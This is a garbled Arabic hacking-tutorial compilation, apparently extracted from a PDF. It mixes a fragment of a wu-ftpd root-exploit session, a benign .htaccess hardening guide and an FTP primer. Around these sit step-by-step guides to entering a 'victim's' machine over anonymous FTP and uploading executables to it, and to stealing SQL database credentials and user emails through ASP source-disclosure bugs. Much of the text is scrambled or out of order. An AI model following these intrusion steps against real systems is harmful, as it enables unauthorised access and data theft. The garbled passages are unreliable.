Tue Mar 7 21:07:39 EST 2000 i686 unknown (uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp !Bang! You have root ‫شوف المر ده‬.‫بعض الثغرات بتحتاجه‬..Guest login ok.0 ‫من الكلم ده تقدر تعرف ان الفيرجين الموجوده هي‬ (.loggin into system USER ftp . ‫طبعا انا نسيت امر الكومبايل‬ man gcc ‫بكل الخيارات اللي معاه‬./wuftpd2600 -t -s 0 196.. this will take about 10 seconds Press ^\ to leave shell Linux lame_box..

..‬في هذه الحاله الكسبلويت مش تشتغل ال لو معانا باسورد و يوزر نيم‬ ‫عشان نخش على الف تي بي بتاع الموقع‪..‬‬ ‫انتهى‪،،،‬‬ ‫" شرح ملف ‪" htaccess‬‬ ‫‪210‬‬ ..‬يبقى مش حنعرف نكمل الكلم ده‬ ‫عشان الكسبلويت مش تشتغل ‪.‬بس المبادئ الساسيه و احده‪.‬‬ ‫عشان كده لزم تقرا السورس بتاع الكسبلويت‪..‬و كل اكسبلويت لها ساينتكس و شغل‬ ‫خاص بيها‪.‫دي مش موجوده ‪.

‫>ةةةةة<‬
‫>ةةةةةة‪< BSD-r00t :‬‬
‫|‬

‫| * مقدمـــة‬
‫|‬
‫| * اهمية ملف ‪htaccess.‬‬
‫|‬
‫| * كيفية عمل ملف ‪htaccess.‬‬
‫|‬
‫| * عمل صفحات ‪ error‬خاصة‬
‫| * منع عرض محتويات المجلد الذي ل يوجد به ‪| index‬‬
‫|‬
‫| * منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫|‬
‫| * تحويل من يحاول فتح لينك للينك اخر‬
‫|‬
‫| * عمل الملف ‪.htpasswd‬‬
‫|‬
‫| *الحماية بواسطه ‪htaccess.‬‬
‫|‬
‫| * منع اظهار الملف ‪htaccess.‬‬
‫|‬
‫| * اضافة مستخدمين في الملف‬
‫|‬
‫| * جعل الصفحات تظهر بامتداد اخر‬
‫‪-------------------------------------------------‬‬‫* مقدمـــة‬
‫‪-----------‬‬‫من اهم وسائل حماية المواقع و اغلق بعض الجزاء فيه بكلمة سر ‪ ,‬و منع بعض الناس من دخل الموقع و‬
‫السماح‬
‫لغيرهم بالدخول ‪ ..‬هو استخدام الملف ‪ htaccess.‬و الذي يمكن عمل الكثير و الكثير به ‪.‬‬
‫و هذا الملف مخفي و محمي بكلمة سر‬
‫* اهمية ملف ‪htaccess.‬‬
‫‪----------------------‬‬‫‪ -1‬حماية اي جزء فيه بكملة سر‬
‫‪ -2‬عمل صفحات ‪ error‬خاصة بك‬
‫‪ -3‬منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪ -4‬منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪ -5‬جعل صفحة البداية بأمتدادات غير ‪.. html , .asp.‬‬
‫‪ -6‬تحويل من يحاول فتح لينك للينك اخر‬
‫* كيفية عمل ملف ‪htaccess.‬‬
‫‪--------------------------‬‬‫يمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طريق عمل للملف‬
‫حفظ باسم و نحفظ‬
‫الملف بهذا السم ‪ htacces.‬على ان يكون ليس امتداده ‪ txt.‬اي ان ليس هناك اسم للملف ‪ ,‬اذا لم تستطيع‬
‫ذلك‬
‫احفظ الملف باسم "‪ - "htaccess.‬علمتي التنصيص في اسم الملف ‪. -‬‬
‫* عمل صفحات ‪ error‬خاصة‬
‫‪-----------------------‬‬‫و الفائدة منها هو ان الموقع يظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقع‬
‫سوف يظهر كان‬
‫الموقع به كل الثغرات و ذلك لن طريقة عمل السكانر هي انه يقوم بتطبيق كل ثغره على الموقع و يرصد‬
‫النتيجه‬
‫‪211‬‬

‫فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره ‪.‬‬
‫و يمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طريق ‪-:‬‬
‫أ‪ -‬تصميم صفحات ال ‪ error‬اول‬
‫ب‪ -‬تحميل الصفحات على الموقع‬
‫ج‪ -‬اضافه السطر التابي في الملف ‪htaccess.‬‬
‫‪ErrorDocument error_num‬‬
‫‪directory_file‬‬
‫بخيث يكون ‪ error_num‬هو رقم الخطا " الرقام موجود بالسفل " و ‪ directory_file‬هو مكان‬
‫صفحه ال ‪ error‬التي‬
‫قمت بتصميمها ‪.‬‬
‫‪ErrorDocument 404‬‬
‫مثال ‪:‬‬
‫‪/errors/nfound.html‬‬
‫ال ‪ errors‬و ارقامها ‪- :‬‬
‫‪----------------------‬‬‫| ‪| Bad Syntax | 400‬‬
‫‪----------------------‬‬‫| ‪| Unauthorized | 401‬‬
‫‪----------------------‬‬‫|‬
‫| ‪Not Used | 402‬‬
‫‪----------------------‬‬‫| ‪| Forbidden | 403‬‬
‫‪----------------------‬‬‫| ‪| Not Found | 404‬‬
‫‪----------------------‬‬‫* منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪----------------------------------------------‬‬‫بعض المواقع عند محاولة فتح اي دليل عليها و ل يكون به ملف ‪ index‬يقوم الموقع بسرد جميع محتويات‬
‫هذا الدليل‬
‫و لحل هذه المشكله توجد طريقتين ‪-:‬‬
‫أ‪ -‬وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‬
‫ب‪ -‬باستخدام الملف ‪ htaccess.‬عن طريق اضافه السطر التالي في الملف ‪-:‬‬
‫‪Options -Indexes‬‬
‫* منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪------------------------------------‬‬‫يمكنك باستخدام الملف ‪ htaccess.‬منع شخص معين من دخول الموقع بعد معرفة الي بي الخاصه به و‬
‫يمكنك التسفاده‬
‫من ذلك حيث يمكنك منع دخل الموقع لمن ل تريد كما يمكنك منع دخول الموقع لي شخص في اسرائيل‬
‫مثل ‪..‬‬
‫و يمكنك ذلك عن طريق اضافة السطر التالي في الملف ‪- :‬‬
‫???‪deny from ???.???.???.‬‬
‫حيث ان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به ‪.‬‬
‫واذا اردت منع اي احد من دخول الموقع يمكنك اضافة السطر التالي ‪-:‬‬
‫‪deny from all‬‬
‫واذا اردت السماح لشخص معين بدخول الموقع يمكنك ذلك باضافة السطر التالي ‪-:‬‬
‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪allow from‬‬

‫‪212‬‬

‫حيث انا ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به‬
‫* تحويل من يحاول فتح لينك للينك اخر‬
‫‪------------------------------------‬‬‫وتسمى هذه العمليه ب ‪ Redirection‬وهي من اهم فوائد ‪ htaccess.‬الملف تستخدم مثل عند تغير‬
‫موقع ملف قديم‬
‫على الموقع الى مكان جديد فيمكنك باستخدام الملف ‪ htaccess.‬عند محاولة احد فتح احد الينك القديم‬
‫توجيه‬
‫الى الينك الجديد عن طريق اضافة السطر التالي في الملف ‪-:‬‬
‫???‪Redirect /somewhere/???.???/???.‬‬
‫‪http://www.site.com/newlocation‬‬
‫بحيث يكون ‪ ???.???/somewhere/‬هو مكان الملف القديم و‬
‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‬
‫الملف الجديد‪.‬‬
‫‪---------‬‬‫* عمل الملف ‪.htpasswd‬‬
‫‪-----------------------‬‬‫ويمكنك تقوم بعمله بنفس طريقة الملف ‪ , htaccess.‬و سوف نعمله تى نسطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫في الحماية و سوف نكتب في الملف ‪ htpasswd‬ما يأتي ‪-:‬‬
‫‪user1:EncryptedPwd1‬‬
‫‪user2:EncryptedPwd2‬‬
‫‪ o‬حيث ان ‪ user1 , user2‬هو اسم المستخدم ‪.‬‬
‫‪ o‬و ‪ EncryptedPwd1 , EncryptedPwd2‬هي كلمات السر ولكن مشفره و يمكنك تشفير اي‬
‫كلمة تريدها‬
‫عن طريق الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫او‬
‫‪http://www.e2.u‬‬‫‪net.com/htaccess/make.htm‬‬
‫فمثل لو اردنا وضع يوسر باسم ‪ Security‬و كلمة السر الخاصة به هي ‪ fu93hds3‬نذهب اول الى‬
‫الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫‪ o‬و ‪username : Security‬‬
‫‪ o‬و ‪passwrod & re-enter password : fu93hds3‬‬
‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتيجه ‪Security:893bNicBcwszw <--‬‬
‫و الن قد اتممنا عمل الملف ‪ htaccess.‬و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫للحماية بكلمة سر و يوسر ‪.‬‬
‫* الحماية بواسطه ‪htaccess.‬‬
‫‪---------------------------‬‬‫و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع ال اذا كان معه‬
‫كلمة السر و اليوسر نيم ‪ ,‬فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد‪.‬‬
‫فعند وضع الملف ‪ htaccess.‬في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوف‬
‫يطلب منه‬
‫كلمة سر و يوسر ‪.‬‬

‫‪213‬‬

‫و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته ‪--:‬‬
‫‪AuthUserFile /somewhere/.htpasswd‬‬
‫"‪AuthName "Enter your user and passed‬‬
‫‪please‬‬
‫‪Require valid-user‬‬
‫‪AuthType Basic‬‬
‫>‪<Limit GET POST‬‬
‫‪require valid-user‬‬
‫>‪<Limit/‬‬
‫‪ o‬بحيث يكون ‪ /somewhere/.htpasswd‬هو مكان ملف ‪ htpasswd.‬على موقعك‬
‫‪ o‬و يكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‬
‫السر‬
‫* منع اظهار الملف ‪htaccess.‬‬
‫‪----------------------------‬‬‫قد عرفنا الن ان لهذا الملف اهميه كبيره فيجب علينا ان نحميه جيدا ‪ ,‬فالبرغم من ان الملف مخفي ال‬
‫انه غير سالم من ان يكون السرفر نفسه غير مؤمن او انه هناك تصريح خطأ ‪..‬‬
‫لذلك سوف نمنع عرض هذا الملف عن طريق اضافة ما يأتي ‪- :‬‬
‫>‪<Files .htaccess‬‬
‫‪order allow,deny‬‬
‫‪deny from all‬‬
‫>‪<Files/‬‬
‫فاذا حاول احد عرض الملف سوف يظهر له ‪. error 403‬‬
‫* جعل الصفحات تظهر بامتداد اخر‬
‫‪------------------------------‬‬‫ويمكن باستخدام هذه الخاصية عمل ملف يظهر كأن امتداده ‪ html.‬و لكنه ذو امتداد ‪ txt.‬مثل ‪.‬‬
‫باضاف السطر التالي ‪-:‬‬
‫‪AddType text/plain html‬‬
‫ويمكنك رؤية كافى التغيرات التي يمكنك عملها في هذا الملف ‪-:‬‬
‫‪http://www.pharaonics.net/books/MIME.txt‬‬
‫انتهى‪،،،‬‬

‫" نظام نقل الملفات ‪" FTP‬‬

‫‪214‬‬

‫>ةةةةة ةة ةةةةة ةةةةة<‬
‫>ةةةةةة‪ :‬ةةةةةة<‬
‫ما هو نقل الملفات ‪ FTP‬؟‬
‫‪ FTP‬هي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات‪ ،‬وهذه الخدمة هي‬
‫احدى تسهيلت ‪ TCP/IP‬التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات‬
‫‪ FTP‬الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم‬
‫تشغيل مختلفة وعليه فلديها أشكال ‪ Formats‬مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم‬
‫به ‪ ,FTP‬وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفًا في أميركا الى جهازنا ‪.‬‬
‫أقسام نقل الملفات‪:‬‬
‫نقل الملفات ينقسم الى قسمين‪:‬‬
‫تنزيل الملفات ‪:Download‬‬
‫وهو جلب الملفات من الكمبيوتر المضيف ‪ Host‬الى الجهاز المحلي ‪.Local‬‬
‫ارسال الملفات ‪:Uplaod‬‬
‫وهو ارسال الملفات من الكمبيوتر المحلي ‪ Local‬الى الكمبيوتر المضيف ‪.Host‬‬
‫ومن الناحية المنية فهناك نوعان لنقل الملفات‪:‬‬
‫نقل مؤمن ‪:Secure FTP‬‬
‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف‪.‬‬
‫نقل مجهول ‪:Anonymous FTP‬‬
‫لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبًا استخدام ‪ guest‬أو ‪ anonymous‬عوضًا‬
‫عنهما‪.‬‬
‫تصنف مصادر البرامج على النترنت الى ثلثة أقسام‪:‬‬
‫ملكية عامة ‪:Public Domain‬‬
‫وضعت البرامج هنا للستخدام العام فليس هناك حقوق ملكية لحد ول قيود على استخدامها وتوزيعها‬
‫وتعديلها‪.‬‬
‫مصادر مجانية ‪:Freeware‬‬
‫يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ول يجوز تعديلها أو بيعها‪.‬‬
‫مصادر مشتركة ‪:Shareware‬‬
‫يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جميع المميزات ويجب تحطيم النسخ بعد‬
‫‪215‬‬

‫انتهاء مدتها‪.‬‬

‫‪ FTP‬و الفيروسات ‪:‬‬
‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين‬
‫‪:ASCII‬‬
‫اختصارًا لـ)‪ (American Standard Code for Information Interchange‬والملفات من‬
‫هذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراوح قيمتها بين الصفر و ‪ .127‬ويستخدم هذا المصطلح‬
‫للتعبير عن المعيار الذي يقوم بتحويل الحرف الى أرقام في الكمبيوتر‪ .‬وتستخدم الملفات النصية هذا النوع‬
‫من الصيغ‪.‬‬
‫‪:Binary‬‬
‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات ‪ bits‬تتراوح بين الصفر و ‪ 255‬وتندرج‬
‫الصور والبرامج والملفات المضغوطة تحت هذا النوع‪.‬‬
‫والفيروسات ل يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما ليمكن أن تنتقل عبر الصور كصيغ & ‪jpg & gif‬‬
‫‪ bmp‬وغيرها من امتدادات الصور ول عبر ملفات الفيديو والصوت مثل ‪avi - ram - mpg - mp3 -‬‬
‫‪ wav‬وغيرها‪ ،‬وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة‬
‫ماتكون‪exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :‬‬
‫‪ ،b64 - bhx‬كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ‪ ،MS Office‬لذلك احذر من هذه‬
‫الملفات وافحصها دائمًا قبل تشغيلها‪.‬‬

‫طريقة نقل الملفات ‪: FTP‬‬
‫هناك طرق عديدة لنقل الملفات وهي‪:‬‬
‫نقل الملفات باستخدام نظام ‪UNIX‬‬
‫تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر ‪:UNIX‬‬
‫‪ :ascii‬لنقل ملفات ‪ ASCII‬النصية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب‬
‫اعادة المر‪.‬‬
‫‪ :binary‬لنقل الملفات الثنائية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة‬
‫المر‪.‬‬
‫‪ :status‬لفحص الملف ومعرفة هل هو من نوع ‪ ASCII‬أو ‪.Binary‬‬
‫‪ :help‬لعرض قائمة بأوامر ‪.UNIX‬‬

‫‪216‬‬

‬وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر ‪ Unix‬المعتادة‪.‬‬ ‫‪ :get filename‬جلب الملف المطلوب وانزاله على جهازك‪.‬‬ ‫نقل الملفات باستخدام حساب ‪:Shell‬‬ ‫ل سوف تدخل‬ ‫أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمث ً‬ ‫حسابك في ‪ Tripod‬عن طريق ‪ ،Unix Shell‬نكتب أوًل المر ‪ ftp‬متبوعًا بالوجهة المرادة فيصبح‪ftp :‬‬ ‫‪ ftp.pc-worlds.‬‬ ‫‪ :bye‬انهاء الرتباط والخروج من النظام البعيد‪.‬‬ ‫‪ :cd directory‬تغيير الدليل‪.Ws_ftp‬‬ ‫استخدام برنامج ‪:Ws_ftp LE 5.06‬‬ ‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج‪ ،‬سيظهر لك مربع حوار ‪Session‬‬ ‫‪ Profile‬والذي من خلله تقوم بتسجيل الدخول‪ ،‬اكتب في خانة ‪ Profile Name‬اسم حساب الدخول؛‬ ‫على سبيل المثال ‪ My Home Page In Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي هذا‬ ‫المثال هو ‪ ftp.‬‬ ‫نقل الملفات باستخدام حساب ‪:SLIP/PPP‬‬ ‫أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة ‪ .‬‬ ‫نقل الملفات باستخدام المتصفح ‪:Browser‬‬ ‫نقل الملفات عن طريق المتصفحات سهل جدًا فما عليك سوى ادخال عنوان الموقع ‪ URL‬ويبدأ العنوان‬ ‫بكلمة ‪ ftp://‬ثم العنوان بدًل من كلمة ‪ http://‬للعناوين العادية‪ ،‬بعد الدخول الى موقع الـ ‪ FTP‬ستأتي‬ ‫الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لنزاله‪.‬‬ ‫‪:mget filename‬جلب مجموعة من الملفات‪.‬‬ ‫وهو مث ً‬ ‫وإذا أردت المزيد من المعلومات عن نظام الـ ‪Unix‬‬ ‫عليك الدخوول الى هذا الموقع ‪:‬‬ ‫‪http://www.‫‪ :dir‬عرض محتويات الدليل‬ ‫‪ :ls‬عرض محتويات الدليل الحالي‪.html‬‬ ‫فهو يفيد المبتدئين فى هذا النظام ‪.com‬ثم ندخل السم وهو عل سبيل المثال "‪ ،"IronPrivate‬ثم نقوم بادخال الرقم السري‬ ‫ل "******"‪ .‬‬ ‫‪ :pwd‬طباعة الدليل الحالي‪.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم بالتدقيق‬ ‫التلقائي في نوع نظام الجهاز المضيف‪ ،‬بعد ذلك قم بكتابة السم في خانة ‪ User ID‬وهو مث ً‬ ‫ل‬ ‫‪ IronPrivate‬ثم الرقم السري في خانة ‪ Password‬وسيظهر مخفيًا على هيئة نجوم ******‪ .‬ثم اضغط‬ ‫‪ .tripod.Client Programs‬وأفضل‬ ‫برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬هو برنامج ‪.OK‬كما في الشكل التالي‪:‬‬ ‫‪217‬‬ .tripod.net/lunexx.

.‬ويختلف العرض حسب نظام الكمبيوتر المضيف‪..‫بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم اليسر‬ ‫هو جهاز الكمبيوتر لديك والقسم اليمن هو جهاز الكمبيوتر المضيف‪ ،‬في هذه المرحلة تستطيع جلب أو‬ ‫ارسال الملفات أو تغيير اسمائها أو حذفها ‪ .‬من ‪ Connect‬اختر ‪Remote‬‬ ‫‪ ..‬أي تستطيع التحكم في محتويات حسابك على النترنت أو‬ ‫على جهازك بسهولة فائقة‪.‬بعد ذلك اضغط ‪ Connect‬وعندما يتم الربط فستحتاج‬ ‫لدخال السم والرقم السري‪ .‬الخ‪ .‬‬ ‫نقل الملفات باستخدام التصال الشبكي البعيد ‪:Telnet‬‬ ‫‪ Telnet‬هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر‬ ‫ل جهازه وكأنه جزء من ذلك الكمبيوتر البعيد‪ .Exit‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق عن طريق ‪"FTP‬‬ ‫‪218‬‬ .‬‬ ‫ استخدام برنامج ‪ Telnet‬من ‪:Windows‬‬‫ل يسمى ‪ Telnet‬يمكنك الدخول عليه بالضغط على قائمة ابدأ ‪ Start‬ثم‬ ‫ترفق ‪ Windows‬برنامجًا سه ً‬ ‫تشغيل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة البدء للبرنامج‪ .System‬في صندوق الحوار ‪ Connect‬الذي سيظهر لك اكتب في خانة ‪ Host Name‬اسم ملقن‬ ‫الجهاز المضيف ثم اكتب في خانة ‪ Port‬الميناء أو المنفذ ) اذا كان لديك( او اتركه كما هو‪ ،‬ثم اختر من الـ‬ ‫‪ ، Term Type‬ان كان لديك وال قم بالتجربة‪ .‬وبعد النتهاء من النقل اختر ‪ Disconnect‬من قائمة ‪ Connect‬وبعد ذلك‬ ‫اختر ‪.‬‬ ‫مضيف جاع ً‬ ‫اذا كان الجهاز البعيد يستخدم نظام ‪ Windows‬فل مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض‬ ‫الوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالوامر اللزمة‪.

password‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote cwd ~root‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Please login with USER and PASS 530‬‬ ‫ثم أكتب الكتابة التالية‬ ‫‪ftp>quote pass ftp‬‬ ‫‪219‬‬ .0 220‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote user ftp‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Anonymous acces allowed.assassin.‫>ةةةةة ةة ةةةةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< hacker dz :‬‬ ‫اليوم سوف نتناول طريقة إقتحام عبر فتيبي‬ ‫‪FTP‬‬ ‫أول و لنجاح القتحام يجب ان يكون لدى الضحية البور‬ ‫‪21‬‬ ‫مفتوح و هو البور الخاص ب‬ ‫‪FTP‬‬ ‫و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها‬ ‫‪Superscanne‬‬ ‫بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي‬ ‫إضغط على‬ ‫‪Start‬‬ ‫ثم‬ ‫‪Run‬‬ ‫ثم اكتب‬ ‫‪ftp –n‬‬ ‫سوف تطلع لك نافدة في الدوس مكتوب عليها‬ ‫‪<FTP‬‬ ‫ؤوكي لحد هنا كل شيء تمام‬ ‫و بعدين اكتب‬ ‫‪Open‬‬ ‫ثم إضغط على‬ ‫إدخال‬ ‫‪Enter‬‬ ‫سوف تتحصل عب النتيجة التالية‬ ‫‪<FTP‬‬ ‫‪To‬‬ ‫أكتب بجانب‬ ‫‪To‬‬ ‫رقم البي للضحية ثم إضغط على إدخال‬ ‫و الن خد بالك معي‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Connected to www.(websrv1 Microsoft FTP Service (Version 4. send identify (e-mail name) as 331‬‬ ‫‪.com‬‬ ‫‪.

Command not implemented.Restart marker reply‬‬ ‫‪110‬‬ ‫‪(Service ready in nnn minutes.System status.‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫و نجحت في القتحام‬ ‫‪. or system help reply‬‬ ‫‪211‬‬ ‫‪.Data connection already open.Command okay‬‬ ‫‪200‬‬ ‫‪. about to open data connection‬‬ ‫‪150‬‬ ‫‪. transfer starting‬‬ ‫‪125‬‬ ‫‪.Anonymous user logged in 230‬‬ ‫مبروك أنت الن في جهاز الضحية‬ ‫ما عليك الن ال ان تقوم بإستعمال‬ ‫اوامر الفتيبي‬ ‫و طبعا لن امر عليها مرور الكرام لكي ل تقعو في المشكلة الي وقعت فيها و هي نجاح القتحام من دون ما‬ ‫أعرف و ل فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من ‪ 20‬دقيقة و انا مجمد اليدي و‬ ‫الضحية عالقة من دون أن أعمل أي شيء و لهدا‬ ‫قمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجاح القتحام‬ ‫‪Pwd‬‬ ‫لكي تعر ما يحتويه الهارد ديسك‬ ‫‪Cd‬‬ ‫لقتحام مجلد مثال‬ ‫‪Cd black‬‬ ‫في هدا المثال قمت بإقتحام مجلد المسمى بلك‬ ‫‪Ls‬‬ ‫لكي يتضح لك محتوى المجلد أو الهارد ديسك‬ ‫‪Get‬‬ ‫لكي تحمل الى سطح المكتب بتاع جهازك‬ ‫مثال‬ ‫‪Get black.exe‬‬ ‫‪Clos‬‬ ‫لقطع التصال مع الضحية‬ ‫هدي أهم الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق‬ ‫الوام و شرحها و ارقامها‬ ‫‪:Codes:‬‬ ‫‪Signification‬‬ ‫‪.exe‬‬ ‫‪Put‬‬ ‫العملية العكسية ل‬ ‫‪Get‬‬ ‫يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في‬ ‫في جهاز الضحية‬ ‫مثال‬ ‫‪Put black. (nnn est un temps‬‬ ‫‪120‬‬ ‫‪.File status okay. superfluous at this site‬‬ ‫‪202‬‬ ‫‪.Directory status‬‬ ‫‪212‬‬ ‫‪220‬‬ .

(Nom de fichier non attribué 553 ،،،‫انتهى‬ " SQL ‫" اختراق الـ‬ 221 ..Service closing control connection .Closing data connection .Connection closed.Data connection open.Requested action aborded: page type unknown 551 .Command not implemented for that parameter 504 .Help message .Bad sequence of commands 503 . transfer aborded Requested file action not taken. (Pas assez de mémoire pour 452 (exécuter l'action .User logged in.Need account for login . pas d'accès 550 (.Service not available. (Fichier non trouvé.Requested file action pendingfurther information . closing control connection ..Not logged in 530 .User name okay.Syntax error in parameters or arguments 501 .Requested file action aborded 552 (Requested action not taken.Requested action aborded: local error processing 451 Requested action not taken.(Entering passive mode (h1.Command not implemented 502 .Syntax error. completed . no transfer in progress . h4. command unrecognized 500 . h3.PATHNAME" created" .Service ready for new user .Need account for storing files 532 Requested action not taken.. h2.Can't open data connection . p1.NAME system type ..possible .Requested file action okay. (Fichier déjà utilisé par autre 213 214 215 220 221 225 226 227 230 250 257 331 332 350 421 425 426 450 (chose . proceed . need password .File status . p2 .

.+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ ..‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< linuxray :‬‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من البيانات التى تحتويها ‪.htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr. Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪..‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال ‪ASP‬‬ ‫وملفات اخرى من نوع *‪ sql.‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr..‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫‪222‬‬ ..‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح 